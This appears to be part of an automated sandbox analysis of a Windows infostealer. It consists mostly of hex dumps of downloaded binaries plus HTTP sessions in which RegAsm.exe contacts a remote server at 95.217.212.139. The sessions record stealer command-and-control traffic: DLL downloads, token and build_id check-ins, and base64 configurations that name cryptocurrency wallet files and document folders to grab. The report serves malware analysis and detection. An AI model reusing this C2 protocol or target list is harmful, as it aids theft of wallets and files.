                                                                                                                                                                                                          2024-04-10 06:56:40 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                          Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                          2024-04-10 06:56:41 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                          Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                          2024-04-10 06:56:41 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                          Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                          2024-04-10 06:56:41 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                          Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                          2024-04-10 06:56:41 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                          Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                          2024-04-10 06:56:41 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                          Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                          2024-04-10 06:56:41 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                          Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          23192.168.2.44976395.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:41 UTC226OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:42 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:42 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 80880
                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:42 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                          2024-04-10 06:56:42 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                                                                                                                                          Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                                                                                                                                          2024-04-10 06:56:42 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                                                                                                                                          Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                                                                                                                                          2024-04-10 06:56:42 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                          Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                          2024-04-10 06:56:42 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                          Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          24192.168.2.44976495.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:43 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 1145
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:43 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------KEBGHCBAEGDHIDGCBAECCont
                                                                                                                                                                                                          2024-04-10 06:56:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:44 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          25192.168.2.44976595.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:44 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGH
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:44 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------BFIIEHJDBKJKECBFHDGHCont
                                                                                                                                                                                                          2024-04-10 06:56:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:45 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:45 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          26192.168.2.44976695.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:45 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:45 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------DAAFBAKECAEGCBFIEGDGCont
                                                                                                                                                                                                          2024-04-10 06:56:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:46 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:46 UTC71INData Raw: 33 63 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 3cRGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp80


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          27192.168.2.44976795.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:47 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI
